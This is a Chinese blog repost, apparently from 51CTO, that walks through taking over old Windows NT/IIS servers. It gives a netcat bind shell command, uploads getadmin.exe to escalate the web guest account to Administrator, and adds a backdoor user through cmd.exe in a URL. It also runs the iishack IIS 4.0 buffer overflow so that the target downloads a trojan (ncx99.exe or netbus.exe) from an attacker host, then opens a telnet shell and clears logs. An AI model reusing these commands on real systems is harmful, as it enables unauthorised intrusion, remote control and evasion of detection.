教你获取WindowsNT的Admin权限的方法
[url]http://www.xxx.com/frankie/cmd.e[/url] ... 20-t%20-e%20cmd.exe
nc -l -p 23 -t -e cmd.exe
这将把cmd.exe绑定到23端口上。
[url]http://www.xxx.com/scripts/uploadn.asp[/url]
guest和iusr_ntsvr2这两个帐号都可以进这个asp页面,在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录。
[url]http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2[/url]
大约十多秒后屏幕显示:
CGI Error
这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。
[url]http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:[/url]\winnt\system32\net.exe%20user%20china%20news%20/add
这样就创建了一个叫china用户,密码是news,然后:
[url]http://www.xxx.com/scripts/getadmin.exe?china[/url]
ftp [url]www.xxx.com[/url] Connected to [url]www.xxx.com[/url] 220 ntsvr2 Microsoft FTP Service (Version 3.0).
User ([url]www.xxx.com:[/url](none)):anonymous 331 Anonymous access allowed, send identity (e-mail name) as password.
[url]http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2[/url]
大约十多秒后屏幕显示:
CGI Error
[url]http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:[/url]\winnt\system32\net.exe%20user%20china%20news%20/add
这样就创建了一个叫china用户,密码是news,然后:
[url]http://www.xxx.com/cgi-bin/getadmin.exe?china[/url]
或者
[url]http://www.xxx.com/scripts/tools/getadmin.exe?china[/url]
iishack.exe ncx99.exe
[url]www.mysvr.com?[/url] 而对方的IIS server是[url]www.xxx.com[/url]
则:
iishack [url]www.xxx.com[/url] 80 [url]www.mysvr.com/ncx99.exe??[/url] (注意,不要加http://字符!)
上述命令输入后这时你应该可以看到
------(IIS 4.0 remote buffer overflow exploit)----------------- (c) dark spyrit -- [email]barns@eeye.com[/email]. [url]http://www.eEye.com[/url] [usage: iishack ] eg - iishack [url]www.xxx.com[/url] 80 [url]www.mysvr.com/thetrojan.exe[/url] do not include 'http://' before hosts! --------------------------------------------------------------- Data sent!
iishack [url]www.example.com[/url] 80 [url]www.myserver.com/netbus.exe[/url]
ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务。 ncx.exe 这是较早的版本,是把端口绑到80的,由于80端口跑web服务,端口已经被使用。所以可能不一定有效。然后,用Telnet到对方的99或80端口:
Telnet [url]www.xxx.com[/url] 99
Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\>[You have full access to the system, happy browsing :)] C:\>[Add a scheduled task to restart inetinfo in X minutes] C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes] C:\>[Clean up any trace or logs we might have left behind.]
这样,你就完全控制了其硬盘上的文件!注意,如果你type exit退出,对方server上的这个进程也会退出。
0
分享
收藏
772篇文章,232W+人气,1粉丝
Ctrl+Enter 发布
发布
取消
推荐专栏更多
路由交换+安全+无线+优化+运维
共40章 | 51CTO夏杰
¥51.00 1697人订阅
网络工程师2.0进阶指南
共30章 | 姜汁啤酒
¥51.00 1570人订阅
自动化运维开发新概念
共20章 | 抚琴煮酒
¥51.00 431人订阅
高并发架构之路
共15章 | sery
¥51.00 507人订阅
前百度高级工程师的架构高可用实战
共15章 | 曹林华
¥51.00 462人订阅
猜你喜欢
扫一扫,领取大礼包
0
xiong2127
转载于:https://blog.51cto.com/xiong/15491
教你获取WindowsNT的Admin权限的方法相关推荐
- 获取NT的admin权限的方法
涉及程序: NT server 描述: 一般用户获取NT服务器Admin权限的方法 详细: 获取NT的admin权限的方法: 一.通过修改注册表 凡是具有登录NT本机的用户,例如IUSR_mac ...
- 获取Android_Studio模拟器root权限的方法
资源内容 在创建模拟模拟器时注意Google Play与GoogleAPI是不同的,较高版本的安卓系统只有选择后者才能获取到root权限,前者是无法获取root权限的. 运行AVD后,在AS的term ...
- 在Android中快速获取手机的高级权限
在Android中快速获取手机的高级权限 想要快速获取Android手机的ROOT权限吗?也许因为ROOT教程太复杂,也许因为不会进工程模式,让我们在使用Android手机时感觉像是开别人的车一样,总 ...
- 获取win10计算机所有权限,如何获得管理员权限 教您win10获取管理员所有权限的方法。...
有时操作电脑时,出现权限不够的提示,明明是我们就是使用者呀,却不够权限.如何获得管理员权限呢?所以今天小编教您win10获取管理员所有权限的方法. 1.首先在桌面上鼠标右键点击"此电脑&qu ...
- 获取超级用户访问权限-redhat 7.2
获取超级用户访问权限 Root用户: 在redhat7.2中root用户特权高于文件系统上的一般特权,用于管理系统,要执行诸如安装或删除软件以及管理系统文件和目录等任务时,必须将特权升级到root用户 ...
- 教你获取Microsoft Office 365E5账号
文末附Microsoft office365安装包链接 文章概要 1.第一节,介绍免费注册E5管理员账号,试用期3个月. 2.第二节,介绍在Github网站上,注册一个具有 workflow权限的PA ...
- 我是如何通过命令执行到最终获取内网Root权限的
简介 此前我曾发表过一篇ltr101的文章,这是我该系列的第二篇.本文我将为大家展示最近我在赏金计划中,发现的一个非常cool的漏洞.以及我是如何通过一个废弃的Web服务器实现远程执行代码的,并最终成 ...
- 教您如何查看MySQL用户权限
教您如何查看MySQL用户权限 如果需要查看MySQL用户权限,应该如何实现呢?下面就为您介绍查看MySQL用户权限的方法,并对授予MySQL用户权限的语句进行介绍,供您参考. 查看MySQL用户权限 ...
- PHP---微信JS-SDK获取access_token/jsapi_ticket/signature权限签名算法,php/thinkphp实现微信分享自定义文字和图片...
PHP---微信JS-SDK获取access_token/jsapi_ticket/signature权限签名算法, php/thinkphp实现微信分享自定义文字和图片. 一.先看微信JS-SDK文 ...
最新文章
- matlab的数值计算功能,MATlAB数值计算功能
- open函数返回-1_4.6 linux的系统调用执行探究(1)
- 学习笔记之centos系统启动流程
- myeclipse将普通java项目转换成maven项目_Myeclipse Java项目转换成Maven项目
- com.autonavi.AMapLocationThread (13): Exception: threading violation: expected the main thread-iOS
- 【Android】音视频开发基础入门
- linux的php探针使用,php探针在Linux下的安装过程
- cad通过钢筋大样生成钢筋明细表插件_易图(CAD插件For2016-2018)下载|易图(CAD插件For2016-2018)官方版下载_v18.3.1_9号软件下载...
- 全面了解APON,BPON,EPON,GPON
- firefox linux 关闭,Firefox 的 Flash 被禁用的解决方法
- 网联最终落地,如何影响第三方支付机构、银联等?
- VeraCrypt命令行下加载加密磁盘
- 织梦DedeCMS后台模块管理列表不显示 【终极解决办法】
- c语言单字符输入和输出函数分别为,c语言第六章字符数据
- Excel中利用宏批量生成md5加密
- 管理信息系统【二】之 管理信息系统与组织变革
- 单片机C语言C51的输入输出
- 五个经常被忽略的指标,你知道几个?
- Android商城App购物车规格联动选择
- 基于SpringBoot与LayUI的后台管理系统
热门文章
- 存储过程和SQL语句比较【转】
- 如何改变SQL SERVER的身份验证模式
- 研究阿里钉钉近三年,我们总结了10大企业级产品的营销套路
- 互联网公司败局汇总,这些公司都是怎么死的?(下篇)
- 预算为0如何拉用户?类类教你5个独门绝技,并说说一些陷阱!
- 互联网金融产品需要什么样的产品经理?
- PMCAFF脉脉:原京东副总裁任鑫教你小团队如何挑战大巨头
- 脑科学助力人工智能,离不开大数据
- Failed to connect to 127.0.0.1:27017, reason: errno:111 Connection refused(MongoDB启动异常)
- MVC4 下DropDownList使用方法(转)